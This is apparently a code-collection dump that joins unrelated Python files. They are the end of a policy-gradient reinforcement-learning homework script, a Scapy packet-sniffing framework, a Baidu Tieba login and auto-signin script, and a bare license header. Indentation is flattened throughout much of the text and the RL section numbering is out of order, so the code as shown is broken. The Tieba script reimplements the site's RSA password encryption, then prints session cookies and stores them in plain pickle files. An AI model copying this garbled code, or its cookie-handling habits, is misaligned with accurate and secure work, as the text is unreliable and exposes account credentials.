q_i.append(np.ones_like(reward) * np.sum(np.power(gamma, np.arange(len(reward))) * reward, axis=-1))
else:
q_i.append([np.sum([np.power(gamma, t_p - t) * reward[t_p] for t_p in range(t, len(reward))]) for t in range(len(reward))])
q_n = np.concatenate(q_i)
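        # Worked example with gamma = 0.5 and rewards [1, 1, 1]:
        #   reward_to_go=False -> Q = [1.75, 1.75, 1.75]  (full discounted return at every t)
        #   reward_to_go=True  -> Q = [1.75, 1.50, 1.00]  (discounted sum from t onward)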
#====================================================================================#
# ----------SECTION 5----------
# Computing Baselines
#====================================================================================#
if nn_baseline:
# If nn_baseline is True, use your neural network to predict reward-to-go
# at each timestep for each trajectory, and save the result in a variable 'b_n'
# like 'ob_no', 'ac_na', and 'q_n'.
#
# Hint #bl1: rescale the output from the nn_baseline to match the statistics
# (mean and std) of the current or previous batch of Q-values. (Goes with Hint
# #bl2 below.)
            b_n = sess.run(baseline_prediction, feed_dict={sy_ob_no : ob_no})
            # Rescale the baseline predictions to match the mean and std of the Q-values.
            b_n = (b_n - np.mean(b_n)) / (np.std(b_n) + 1e-4)
            b_n = b_n * np.std(q_n) + np.mean(q_n)
adv_n = q_n - b_n
else:
adv_n = q_n.copy()
#====================================================================================#
# ----------SECTION 4----------
# Advantage Normalization
#====================================================================================#
if normalize_advantages:
# On the next line, implement a trick which is known empirically to reduce variance
# in policy gradient methods: normalize adv_n to have mean zero and std=1.
# YOUR_CODE_HERE
adv_n -= np.mean(adv_n, axis=0)
adv_n /= np.std(adv_n, axis=0) + 1e-4
#====================================================================================#
# ----------SECTION 5----------
# Optimizing Neural Network Baseline
#====================================================================================#
if nn_baseline:
# ----------SECTION 5----------
# If a neural network baseline is used, set up the targets and the inputs for the
# baseline.
#
# Fit it to the current batch in order to use for the next iteration. Use the
# baseline_update_op you defined earlier.
#
# Hint #bl2: Instead of trying to target raw Q-values directly, rescale the
# targets to have mean zero and std=1. (Goes with Hint #bl1 above.)
# YOUR_CODE_HERE
            baseline_input = ob_no
            baseline_target = q_n.copy()
            baseline_target -= np.mean(baseline_target, axis=0)
            baseline_target /= np.std(baseline_target, axis=0) + 1e-4
sess.run(baseline_update_op, feed_dict={sy_ob_no : baseline_input,
baseline_target_n: baseline_target})
#====================================================================================#
# ----------SECTION 4----------
# Performing the Policy Update
#====================================================================================#
# Call the update operation necessary to perform the policy gradient update based on
# the current batch of rollouts.
#
# For debug purposes, you may wish to save the value of the loss function before
# and after an update, and then log them below.
# YOUR_CODE_HERE
feed_dict = {sy_ob_no : ob_no,
sy_ac_na : ac_na,
sy_adv_n : adv_n}
loss_before = sess.run(loss, feed_dict=feed_dict)
sess.run(update_op, feed_dict=feed_dict)
loss_after = sess.run(loss, feed_dict)
loss_delta = loss_after - loss_before
# Log diagnostics
returns = [path["reward"].sum() for path in paths]
ep_lengths = [pathlength(path) for path in paths]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("Loss_Delta", loss_delta)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
logz.dump_tabular()
logz.pickle_tf_vars()
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='vpg')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=1.0)
parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-b', type=int, default=1000)
parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
parser.add_argument('--reward_to_go', '-rtg', action='store_true')
parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
parser.add_argument('--nn_baseline', '-bl', action='store_true')
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--n_layers', '-l', type=int, default=1)
parser.add_argument('--size', '-s', type=int, default=32)
args = parser.parse_args()
if not(os.path.exists('data')):
os.makedirs('data')
logdir = args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join('data', logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
for e in range(args.n_experiments):
seed = args.seed + 10*e
print('Running experiment with seed %d'%seed)
def train_func():
train_PG(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
min_timesteps_per_batch=args.batch_size,
max_path_length=max_path_length,
learning_rate=args.learning_rate,
reward_to_go=args.reward_to_go,
animate=args.render,
logdir=os.path.join(logdir,'%d'%seed),
normalize_advantages=not(args.dont_normalize_advantages),
nn_baseline=args.nn_baseline,
seed=seed,
n_layers=args.n_layers,
size=args.size
)
# Awkward hacky process runs, because Tensorflow does not like
# repeatedly calling train_PG in the same thread.
p = Process(target=train_func, args=tuple())
p.start()
p.join()
if __name__ == "__main__":
main()
|
sniffer.py
|
# coding: utf-8
import scapy.all as scapy
import threading
import logging
logger = logging.getLogger(__name__)
class StopSniffing(Exception):
"""StopSniffing may raised while processing a packet to indicate stop the sniffer."""
class Sniffer:
"""
Sniffer is the core component of the traffic capture framework.
This class uses the Scapy sniffer to collect packets off the wire. It then
passes them to the modules for processing.
"""
def __init__(self, iface, processor=None, store=False, filter=None, quantum=0.25, modules=None):
"""
Arguments:
iface (str): Name of the interface to listen on.
processor (function(scapy.Packet)): Function to be called each time a packet is intercepted. The given packet is mutable.
store (bool): Whether to store sniffed packets or discard them
filter (str): pcap filter applied to the socket, such that only filtered packets will be processed. See `man pcap-filter` for more detail.
quantum (float): Interval, in seconds, to stop the sniffer to check the stop event.
modules (list(Module)): List of modules to launch the sniffer with.
"""
self.iface = iface
self.processor = processor
self.store = store
self.quantum = quantum
self.filter = filter
self.modules = []
self.packets = []
self._thread = None
self._l2socket = None
self._stopevent = threading.Event()
self._moduleslock = threading.RLock()
self._newmodules = []
self._activemodules = []
if modules is not None:
self.register(*modules)
def register(self, *mods):
"""Add new modules to the sniffer"""
with self._moduleslock:
self.modules.extend(mods)
self._newmodules.extend(mods)
def process(self, pkt):
"""Process the given packet through each active module, and self.processor"""
with self._moduleslock:
for mod in self._activemodules:
try:
mod.process(pkt)
except StopSniffing:
self._stopevent.set()
if self.processor is not None:
try:
self.processor(pkt)
except StopSniffing:
self._stopevent.set()
def run(self):
"""Run the sniffer on the current thread, blocking until it terminates"""
try:
self._l2socket = scapy.conf.L2listen(iface=self.iface, filter=self.filter)
while not self._stopevent.is_set():
# Start any newly added modules.
with self._moduleslock:
while self._newmodules:
mod = self._newmodules.pop()
mod.start(self)
self._activemodules.append(mod)
# Sniff for one quantum, processing packets as we go.
pkts = self._l2socket.sniff(timeout=self.quantum, prn=self.process, store=self.store)
self.packets.extend(pkts)
finally:
# Stop all the active modules and close the sniffing socket.
with self._moduleslock:
while self._activemodules:
self._activemodules.pop().stop()
if self._l2socket is not None:
self._l2socket.close()
self._l2socket = None
def start(self):
"""Start the sniffer on a new thread"""
self._stopevent.clear()
if self._thread is None or not self._thread.is_alive():
with self._moduleslock:
self._newmodules = list(self.modules)
self._activemodules = list()
self._thread = threading.Thread(target=self.run, daemon=True)
self._thread.start()
def stop(self):
"""Signal the sniffer to stop terminate"""
self._stopevent.set()
def join(self):
"""Block until the sniffer thread has terminated"""
if self._thread is not None:
self._thread.join()
def __enter__(self):
self.start()
return self
def __exit__(self, *args, **kwargs):
self.stop()
class Module:
"""
Module provides a feature on top of the sniffing platform.
User defined modules should inherit from this class.
"""
def start(self, sniffer):
"""
Called when the sniffer starts, or when this module is added to a running sniffer.
"""
def process(self, pkt):
"""
Process will be called for every packet received by the sniffer.
Process may raise StopSniffing to signal that the sniffer should terminate.
"""
def stop(self):
"""
Stop will be called when the sniffer stops.
"""
|
tieba_signin.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import pprint
import http.cookiejar as cookiejar
import requests
import pickle
import execjs
import time
import random
import getpass
import sys, os
from tkinter import *
import tkinter.messagebox as messagebox
from threading import Thread
from PIL import Image
from io import BytesIO
from bs4 import BeautifulSoup
baiduRSAjs = """
function BarrettMu(t) {
this.modulus = biCopy(t),
this.k = biHighIndex(this.modulus) + 1;
var e = new BigInt;
e.digits[2 * this.k] = 1,
this.mu = biDivide(e, this.modulus),
this.bkplus1 = new BigInt,
this.bkplus1.digits[this.k + 1] = 1,
this.modulo = BarrettMu_modulo,
this.multiplyMod = BarrettMu_multiplyMod,
this.powMod = BarrettMu_powMod
}
function BarrettMu_modulo(t) {
var e = biDivideByRadixPower(t, this.k - 1),
i = biMultiply(e, this.mu),
n = biDivideByRadixPower(i, this.k + 1),
r = biModuloByRadixPower(t, this.k + 1),
o = biMultiply(n, this.modulus),
s = biModuloByRadixPower(o, this.k + 1),
a = biSubtract(r, s);
a.isNeg && (a = biAdd(a, this.bkplus1));
for (var u = biCompare(a, this.modulus) >= 0; u;) a = biSubtract(a, this.modulus), u = biCompare(a, this.modulus) >= 0;
return a
}
function BarrettMu_multiplyMod(t, e) {
var i = biMultiply(t, e);
return this.modulo(i)
}
function BarrettMu_powMod(t, e) {
var i = new BigInt;
i.digits[0] = 1;
for (var n = t, r = e; 0 != (1 & r.digits[0]) && (i = this.multiplyMod(i, n)), r = biShiftRight(r, 1), 0 != r.digits[0] || 0 != biHighIndex(r);) n = this.multiplyMod(n, n);
return i
}
function setMaxDigits(t) {
maxDigits = t, ZERO_ARRAY = new Array(maxDigits);
for (var e = 0; e < ZERO_ARRAY.length; e++) ZERO_ARRAY[e] = 0;
bigZero = new BigInt, bigOne = new BigInt, bigOne.digits[0] = 1
}
function BigInt(t) {
this.digits = "boolean" == typeof t && 1 == t ? null : ZERO_ARRAY.slice(0), this.isNeg = !1
}
function biFromDecimal(t) {
for (var e, i = "-" == t.charAt(0), n = i ? 1 : 0; n < t.length && "0" == t.charAt(n);)++n;
if (n == t.length) e = new BigInt;
else {
var r = t.length - n,
o = r % dpl10;
for (0 == o && (o = dpl10), e = biFromNumber(Number(t.substr(n, o))), n += o; n < t.length;) e = biAdd(biMultiply(e, lr10), biFromNumber(Number(t.substr(n, dpl10)))), n += dpl10;
e.isNeg = i
}
return e
}
function biCopy(t) {
var e = new BigInt(!0);
return e.digits = t.digits.slice(0), e.isNeg = t.isNeg, e
}
function biFromNumber(t) {
var e = new BigInt;
e.isNeg = 0 > t, t = Math.abs(t);
for (var i = 0; t > 0;) e.digits[i++] = t & maxDigitVal, t >>= biRadixBits;
return e
}
function reverseStr(t) {
for (var e = "", i = t.length - 1; i > -1; --i) e += t.charAt(i);
return e
}
function biToString(t, e) {
var i = new BigInt;
i.digits[0] = e;
for (var n = biDivideModulo(t, i), r = hexatrigesimalToChar[n[1].digits[0]]; 1 == biCompare(n[0], bigZero);) n = biDivideModulo(n[0], i), digit = n[1].digits[0], r += hexatrigesimalToChar[n[1].digits[0]];
return (t.isNeg ? "-" : "") + reverseStr(r)
}
function biToDecimal(t) {
var e = new BigInt;
e.digits[0] = 10;
for (var i = biDivideModulo(t, e), n = String(i[1].digits[0]); 1 == biCompare(i[0], bigZero);) i = biDivideModulo(i[0], e), n += String(i[1].digits[0]);
return (t.isNeg ? "-" : "") + reverseStr(n)
}
function digitToHex(t) {
var e = 15,
n = "";
for (i = 0; 4 > i; ++i) n += hexToChar[t & e], t >>>= 4;
return reverseStr(n)
}
function biToHex(t) {
for (var e = "", i = (biHighIndex(t), biHighIndex(t)); i > -1; --i) e += digitToHex(t.digits[i]);
return e
}
function charToHex(t) {
var e, i = 48,
n = i + 9,
r = 97,
o = r + 25,
s = 65,
a = 90;
return e = t >= i && n >= t ? t - i : t >= s && a >= t ? 10 + t - s : t >= r && o >= t ? 10 + t - r : 0
}
function hexToDigit(t) {
for (var e = 0, i = Math.min(t.length, 4), n = 0; i > n; ++n) e <<= 4, e |= charToHex(t.charCodeAt(n));
return e
}
function biFromHex(t) {
for (var e = new BigInt, i = t.length, n = i, r = 0; n > 0; n -= 4, ++r) e.digits[r] = hexToDigit(t.substr(Math.max(n - 4, 0), Math.min(n, 4)));
return e
}
function biFromString(t, e) {
var i = "-" == t.charAt(0),
n = i ? 1 : 0,
r = new BigInt,
o = new BigInt;
o.digits[0] = 1;
for (var s = t.length - 1; s >= n; s--) {
var a = t.charCodeAt(s),
u = charToHex(a),
c = biMultiplyDigit(o, u);
r = biAdd(r, c), o = biMultiplyDigit(o, e)
}
return r.isNeg = i, r
}
function biDump(t) {
return (t.isNeg ? "-" : "") + t.digits.join(" ")
}
function biAdd(t, e) {
var i;
if (t.isNeg != e.isNeg) e.isNeg = !e.isNeg, i = biSubtract(t, e), e.isNeg = !e.isNeg;
else {
i = new BigInt;
for (var n, r = 0, o = 0; o < t.digits.length; ++o) n = t.digits[o] + e.digits[o] + r, i.digits[o] = 65535 & n, r = Number(n >= biRadix);
i.isNeg = t.isNeg
}
return i
}
function biSubtract(t, e) {
var i;
if (t.isNeg != e.isNeg) e.isNeg = !e.isNeg, i = biAdd(t, e), e.isNeg = !e.isNeg;
else {
i = new BigInt;
var n, r;
r = 0;
for (var o = 0; o < t.digits.length; ++o) n = t.digits[o] - e.digits[o] + r, i.digits[o] = 65535 & n, i.digits[o] < 0 && (i.digits[o] += biRadix), r = 0 - Number(0 > n);
if (-1 == r) {
r = 0;
for (var o = 0; o < t.digits.length; ++o) n = 0 - i.digits[o] + r, i.digits[o] = 65535 & n, i.digits[o] < 0 && (i.digits[o] += biRadix), r = 0 - Number(0 > n);
i.isNeg = !t.isNeg
} else i.isNeg = t.isNeg
}
return i
}
function biHighIndex(t) {
for (var e = t.digits.length - 1; e > 0 && 0 == t.digits[e];)--e;
return e
}
function biNumBits(t) {
var e, i = biHighIndex(t),
n = t.digits[i],
r = (i + 1) * bitsPerDigit;
for (e = r; e > r - bitsPerDigit && 0 == (32768 & n); --e) n <<= 1;
return e
}
function biMultiply(t, e) {
for (var i, n, r, o = new BigInt, s = biHighIndex(t), a = biHighIndex(e), u = 0; a >= u; ++u) {
for (i = 0, r = u, j = 0; s >= j; ++j, ++r) n = o.digits[r] + t.digits[j] * e.digits[u] + i, o.digits[r] = n & maxDigitVal, i = n >>> biRadixBits;
o.digits[u + s + 1] = i
}
return o.isNeg = t.isNeg != e.isNeg, o
}
function biMultiplyDigit(t, e) {
var i, n, r;
result = new BigInt, i = biHighIndex(t), n = 0;
for (var o = 0; i >= o; ++o) r = result.digits[o] + t.digits[o] * e + n, result.digits[o] = r & maxDigitVal, n = r >>> biRadixBits;
return result.digits[1 + i] = n, result
}
function arrayCopy(t, e, i, n, r) {
for (var o = Math.min(e + r, t.length), s = e, a = n; o > s; ++s, ++a) i[a] = t[s]
}
function biShiftLeft(t, e) {
var i = Math.floor(e / bitsPerDigit),
n = new BigInt;
arrayCopy(t.digits, 0, n.digits, i, n.digits.length - i);
for (var r = e % bitsPerDigit, o = bitsPerDigit - r, s = n.digits.length - 1, a = s - 1; s > 0; --s, --a) n.digits[s] = n.digits[s] << r & maxDigitVal | (n.digits[a] & highBitMasks[r]) >>> o;
return n.digits[0] = n.digits[s] << r & maxDigitVal, n.isNeg = t.isNeg, n
}
function biShiftRight(t, e) {
var i = Math.floor(e / bitsPerDigit),
n = new BigInt;
arrayCopy(t.digits, i, n.digits, 0, t.digits.length - i);
for (var r = e % bitsPerDigit, o = bitsPerDigit - r, s = 0, a = s + 1; s < n.digits.length - 1; ++s, ++a) n.digits[s] = n.digits[s] >>> r | (n.digits[a] & lowBitMasks[r]) << o;
return n.digits[n.digits.length - 1] >>>= r, n.isNeg = t.isNeg, n
}
function biMultiplyByRadixPower(t, e) {
var i = new BigInt;
return arrayCopy(t.digits, 0, i.digits, e, i.digits.length - e), i
}
function biDivideByRadixPower(t, e) {
var i = new BigInt;
return arrayCopy(t.digits, e, i.digits, 0, i.digits.length - e), i
}
function biModuloByRadixPower(t, e) {
var i = new BigInt;
return arrayCopy(t.digits, 0, i.digits, 0, e), i
}
function biCompare(t, e) {
if (t.isNeg != e.isNeg) return 1 - 2 * Number(t.isNeg);
for (var i = t.digits.length - 1; i >= 0; --i) if (t.digits[i] != e.digits[i]) return t.isNeg ? 1 - 2 * Number(t.digits[i] > e.digits[i]) : 1 - 2 * Number(t.digits[i] < e.digits[i]);
return 0
}
function biDivideModulo(t, e) {
var i, n, r = biNumBits(t),
o = biNumBits(e),
s = e.isNeg;
if (o > r) return t.isNeg ? (i = biCopy(bigOne), i.isNeg = !e.isNeg, t.isNeg = !1, e.isNeg = !1, n = biSubtract(e, t), t.isNeg = !0, e.isNeg = s) : (i = new BigInt, n = biCopy(t)), new Array(i, n);
i = new BigInt, n = t;
for (var a = Math.ceil(o / bitsPerDigit) - 1, u = 0; e.digits[a] < biHalfRadix;) e = biShiftLeft(e, 1), ++u, ++o, a = Math.ceil(o / bitsPerDigit) - 1;
n = biShiftLeft(n, u), r += u;
for (var c = Math.ceil(r / bitsPerDigit) - 1, l = biMultiplyByRadixPower(e, c - a); - 1 != biCompare(n, l);)++i.digits[c - a], n = biSubtract(n, l);
for (var d = c; d > a; --d) {
var f = d >= n.digits.length ? 0 : n.digits[d],
h = d - 1 >= n.digits.length ? 0 : n.digits[d - 1],
g = d - 2 >= n.digits.length ? 0 : n.digits[d - 2],
p = a >= e.digits.length ? 0 : e.digits[a],
m = a - 1 >= e.digits.length ? 0 : e.digits[a - 1];
i.digits[d - a - 1] = f == p ? maxDigitVal : Math.floor((f * biRadix + h) / p);
for (var v = i.digits[d - a - 1] * (p * biRadix + m), b = f * biRadixSquared + (h * biRadix + g); v > b;)--i.digits[d - a - 1], v = i.digits[d - a - 1] * (p * biRadix | m), b = f * biRadix * biRadix + (h * biRadix + g);
l = biMultiplyByRadixPower(e, d - a - 1), n = biSubtract(n, biMultiplyDigit(l, i.digits[d - a - 1])), n.isNeg && (n = biAdd(n, l), --i.digits[d - a - 1])
}
return n = biShiftRight(n, u), i.isNeg = t.isNeg != s, t.isNeg && (i = s ? biAdd(i, bigOne) : biSubtract(i, bigOne), e = biShiftRight(e, u), n = biSubtract(e, n)), 0 == n.digits[0] && 0 == biHighIndex(n) && (n.isNeg = !1), new Array(i, n)
}
function biDivide(t, e) {
return biDivideModulo(t, e)[0]
}
function biModulo(t, e) {
return biDivideModulo(t, e)[1]
}
function biMultiplyMod(t, e, i) {
return biModulo(biMultiply(t, e), i)
}
function biPow(t, e) {
for (var i = bigOne, n = t; 0 != (1 & e) && (i = biMultiply(i, n)), e >>= 1, 0 != e;) n = biMultiply(n, n);
return i
}
function biPowMod(t, e, i) {
for (var n = bigOne, r = t, o = e; 0 != (1 & o.digits[0]) && (n = biMultiplyMod(n, r, i)), o = biShiftRight(o, 1), 0 != o.digits[0] || 0 != biHighIndex(o);) r = biMultiplyMod(r, r, i);
return n
}
function RSAKeyPair(t, e, i) {
this.e = biFromHex(t),
this.d = biFromHex(e),
this.m = biFromHex(i),
console.log(this.e), console.log(this.d), console.log(this.m),
this.chunkSize = 2 * biHighIndex(this.m),
this.radix = 16,
this.barrett = new BarrettMu(this.m)
}
function twoDigit(t) {
return (10 > t ? "0" : "") + String(t)
}
function encryptedString(t, e) {
for (var i = new Array, n = e.length, r = 0; n > r;) i[r] = e.charCodeAt(r), r++;
for (; i.length % t.chunkSize != 0;) i[r++] = 0;
var o, s, a, u = i.length,
c = "";
for (r = 0; u > r; r += t.chunkSize) {
for (a = new BigInt, o = 0, s = r; s < r + t.chunkSize; ++o) a.digits[o] = i[s++], a.digits[o] += i[s++] << 8;
var l = t.barrett.powMod(a, t.e),
d = 16 == t.radix ? biToHex(l) : biToString(l, t.radix);
c += d + " "
}
return c.substring(0, c.length - 1)
}
function encryptPass(pass, serverTime) {
var password = SBCtoDBC(pass) + serverTime;
setMaxDigits(131);
console.log(password);
var u = new RSAKeyPair("10001", "", "B3C61EBBA4659C4CE3639287EE871F1F48F7930EA977991C7AFE3CC442FEA49643212E7D570C853F368065CC57A2014666DA8AE7D493FD47D171C0D894EEE3ED7F99F6798B7FFD7B5873227038AD23E3197631A8CB642213B9F27D4901AB0D92BFA27542AE890855396ED92775255C977F5C302F1E7ED4B1E369C12CB6B1822F");
password = encryptedString(u, password);
console.log(password);
return password;
}
function SBCtoDBC(t) {
var e = "";
if (t) {
for (var i = t.length, n = 0; i > n; n++) {
var r = t.charCodeAt(n);
r = r >= 65281 && 65374 >= r ? r - 65248 : r, r = 12288 == r ? 32 : r, e += String.fromCharCode(r)
}
return e
}
}
function decryptedString(t, e) {
var i, n, r, o = e.split(" "),
s = "";
for (i = 0; i < o.length; ++i) {
var a;
for (a = 16 == t.radix ? biFromHex(o[i]) : biFromString(o[i], t.radix), r = t.barrett.powMod(a, t.d), n = 0; n <= biHighIndex(r); ++n) s += String.fromCharCode(255 & r.digits[n], r.digits[n] >> 8)
}
return 0 == s.charCodeAt(s.length - 1) && (s = s.substring(0, s.length - 1)), s
}
var biRadixBase = 2,
biRadixBits = 16,
bitsPerDigit = biRadixBits,
biRadix = 65536,
biHalfRadix = biRadix >>> 1,
biRadixSquared = biRadix * biRadix,
maxDigitVal = biRadix - 1,
maxInteger = 9999999999999998,
maxDigits, ZERO_ARRAY, bigZero, bigOne;
setMaxDigits(20);
var dpl10 = 15,
lr10 = biFromNumber(1e15),
hexatrigesimalToChar = new Array("0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"),
hexToChar = new Array("0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "a", "b", "c", "d", "e", "f"),
highBitMasks = new Array(0, 32768, 49152, 57344, 61440, 63488, 64512, 65024, 65280, 65408, 65472, 65504, 65520, 65528, 65532, 65534, 65535),
lowBitMasks = new Array(0, 1, 3, 7, 15, 31, 63, 127, 255, 511, 1023, 2047, 4095, 8191, 16383, 32767, 65535);
"""
class InputWindow(Frame):
def __init__(self, parent, image):
Frame.__init__(self, parent)
self.parent = parent
self.pack()
self.centerWindow()
if isinstance(image, str): # file name
self.photo = PhotoImage(file=image)
else: # binary data
self.photo = PhotoImage(data=image)
self.createWidgets()
def centerWindow(self):
w = 200
h = 120
sw = self.parent.winfo_screenwidth()
sh = self.parent.winfo_screenheight()
x = (sw - w)/2
y = (sh - h)/2
self.parent.geometry('%dx%d+%d+%d' % (w, h, x, y))
def createWidgets(self):
self.label = Label(self, image=self.photo)
self.label.image = self.photo # keep a reference!
self.label.pack()
self.textInput = Entry(self)
self.textInput.pack()
self.okButton = Button(self, text="确定", command=self.confirm)
self.okButton.pack()
def confirm(self):
"""验证码输入完则赋值给全局变量verifyCode"""
name = self.textInput.get()
if len(name) == 4:
global verifyCode
verifyCode = name
self.destroy()
self.quit()
else:
messagebox.showinfo("提示", "验证码格式不正确!")
def getTimestamp():
return str(int(time.time() * 1000))
def getServerTime():
url = "https://wappass.baidu.com/wp/api/security/antireplaytoken?v=" + getTimestamp()
res = requests.get(url)
try:
return res.json()["time"]
except:
return ""
def inputUsernameAndPassword():
_username = input("请输入用户名:")
_password = getpass.getpass("请输入密码(不会显示出来):")
return (_username, _password)
def getUID():
url = "https://wappass.baidu.com/passport/?login"
res = requests.get(url)
return res.cookies["BAIDU_WISE_UID"][0:-3] + str(random.randint(100,999))
def getGID():
def transform(char):
"""算法来自base_xxxx.js"""
if char == "4" or char == "-": return char
number = random.randint(0, 15)
if char != "x": number = 3 & number | 8
return format(number, "x").upper()
return "".join([transform(c) for c in "xxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx"])
def encryptPassword(password, servertime):
ctx = execjs.compile(baiduRSAjs)
return ctx.call("encryptPass", password, servertime)
def getVerifycodeImage(url):
res = requests.get(url)
if res.status_code == 200:
inBuff = BytesIO(res.content) # create from the response bytes
outBuff = BytesIO() # create an output stream
im = Image.open(inBuff) # create an Image object from the BytesIO object
im.save(outBuff, "GIF") # convert the image to a GIF byte stream
# localFile = "verifycodeImage.gif"
# open(localFile, "wb").write(outBuff.getvalue())
return outBuff.getvalue()
return
def showVerifycodeImage(image):
""" 弹GUI窗口显示验证码,获取用户输入 """
root = Tk()
app = InputWindow(root, image=image)
app.master.title("验证码输入")
# Keep the window on top
root.lift()
root.call('wm', 'attributes', '.', '-topmost', True)
root.after_idle(root.call, 'wm', 'attributes', '.', '-topmost', False)
root.mainloop()
def loginReq(params):
anyCookie = {"aaaa": "2A64BAAC0FF64743A2CE8A60A71075E7"} # 要随便带一个Cookie,不然服务器返回:”开启cookie之后才能登录“
url = "https://wappass.baidu.com/wp/api/login"
res = requests.post(url, data=params, cookies=anyCookie)
pprint.pprint(res.json())
errCode, errMsg, codeString = res.json()["errInfo"]["no"], res.json()["errInfo"]["msg"], res.json()["data"]["codeString"]
cookie = res.cookies
gotoUrl = res.json()["data"]["gotoUrl"]
return errCode, errMsg, codeString, cookie, gotoUrl
def saveCookiesForUser(username, cookie):
cookieFile = os.path.join(appDir, username + ".cookies")
with open(cookieFile, 'wb') as f:
pickle.dump(cookie, f)
def loadCookiesForUser(username):
print("\n用户:" + username, flush=True)
cookieFile = os.path.join(appDir, username + ".cookies")
with open(cookieFile, 'rb') as f:
return pickle.load(f)
def login(username, password):
servertime = getServerTime()
gid = getGID()
password = encryptPassword(password, servertime)
postData = {
"username" : username,
"password" : password,
"servertime" : servertime,
"gid" : gid,
"verifycode" : "",
"vcodestr" : "",
# "clientfrom" : "native",
# "client" : "ios",
"logLoginType" : "sdk_login",
}
errCode = "-1"
while errCode != "0":
# pprint.pprint(postData)
errCode, errMsg, verifycodeToken, cookie, gotoUrl = loginReq(postData)
print(errMsg, flush=True)
if errCode in ["500001", "500002"]: # 需要输入验证码
verifycodeURL = "https://wappass.baidu.com/cgi-bin/genimage?" + verifycodeToken + "&v=" + getTimestamp()
imageData = getVerifycodeImage(verifycodeURL)
showVerifycodeImage(imageData)
global verifyCode
if verifyCode == "":
print("用户取消输入")
break # the user closed the window with the system close button
print("用户输入:" + verifyCode, flush=True)
postData["verifycode"] = verifyCode
postData["vcodestr"] = verifycodeToken
elif errCode in ["400101", "400023", "400032", "400034", "120016", "400024"]: # 需要验证手机短信什么的
print("\n需要安全验证,请打开网址进行:" + gotoUrl)
break
elif errCode == "0": # 登录成功
# 保存cookie,return True
saveCookiesForUser(username, cookie)
print(cookie)
print("\n" , username , " 登录成功!\n")
break
else: # wrong password or similar error
print("\n无法处理,退出")
break
def getUsersTieba(cookie):
print("\n获取喜欢的贴吧...")
url = "http://tieba.baidu.com/mo/q/?type=json&page=like"
res = requests.get(url, cookies=cookie)
html = res.json()["like"]["html"]
result = []
soup = BeautifulSoup(html, "html.parser")
for node in soup("li"):
item = node.a["data-fid"], node.a["data-start-app-param"], node.a.contents[-1].string # 最后一个div的值是级数(level)
result.append(item)
# print(item, flush=True)
return result
def signin(tiebars, cookie):
""" 循环签到用户的贴吧 """
tbsUrl = "http://tieba.baidu.com/dc/common/tbs"
tbs = requests.get(tbsUrl, cookies=cookie, timeout=0.5).json()["tbs"]
signinUrl = "http://tieba.baidu.com/mo/q/sign?is_like=1&mo_device=1&tbs=" + tbs
threads = []
print("\n开始签到...")
for bar in tiebars:
params = { "kw" : bar[1], "fid" : bar[0] }
# signOneBar(signinUrl, bar, params, cookie)
t = Thread(target=signOneBar, args=(signinUrl, bar, params, cookie))
threads.append(t)
t.start()
for child in threads: child.join() # wait for all child threads to finish before continuing
def signOneBar(url, bar, params, cookie):
try:
signinRes = requests.get(url, params=params, cookies=cookie).json()
if signinRes["no"] == 0:
errCode = "成功"
errMsg = "经验:" + signinRes["error"]
else:
errCode = str(signinRes["no"])
errMsg = signinRes["error"]
res = bar[1] + "\t-- 级数:" + bar[2] + ", 结果:" + errCode + ", 信息: " + errMsg
print(res, flush=True)
except Exception as e:
print("error: ", e, flush=True)
def getLoginedUsers():
"""在当前目录下搜索.cookies结尾的文件,以确定哪些用户已登录"""
files = list(filter(lambda n: n.endswith(".cookies"), os.listdir(appDir)))
usernames = list(map(lambda f: f.split(".")[0], files ))
return usernames
def startLogin():
(username, password) = inputUsernameAndPassword()
global verifyCode
verifyCode = ""
login(username, password)
def startSignin():
users = getLoginedUsers()
if len(users) == 0:
print("无登录用户,退出")
sys.exit(0)
print("\n已登录用户:" , users, flush=True)
for user in users:
try:
cookie = loadCookiesForUser(user)
bars = getUsersTieba(cookie)
signin(bars, cookie)
except Exception as e:
print(e)
print("\n下一个...\n", flush=True)
print("====================== 完成一轮 ======================\n")
if __name__ == "__main__":
print("运行...")
fullPath = os.path.realpath(__file__)
appDir = os.path.dirname(fullPath)
# print(appDir)
if len(sys.argv) == 2 and sys.argv[1] == "-l":
print("===== 登录模式 =====")
startLogin()
else:
print("===== 签到模式 =====")
startSignin()
time.sleep(20) # run one more round after 20 seconds
startSignin()
|
robotremoteserver.py
|
# Copyright 2008-2015 Nokia Networks
# Copyright 2016- Robot Framework Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
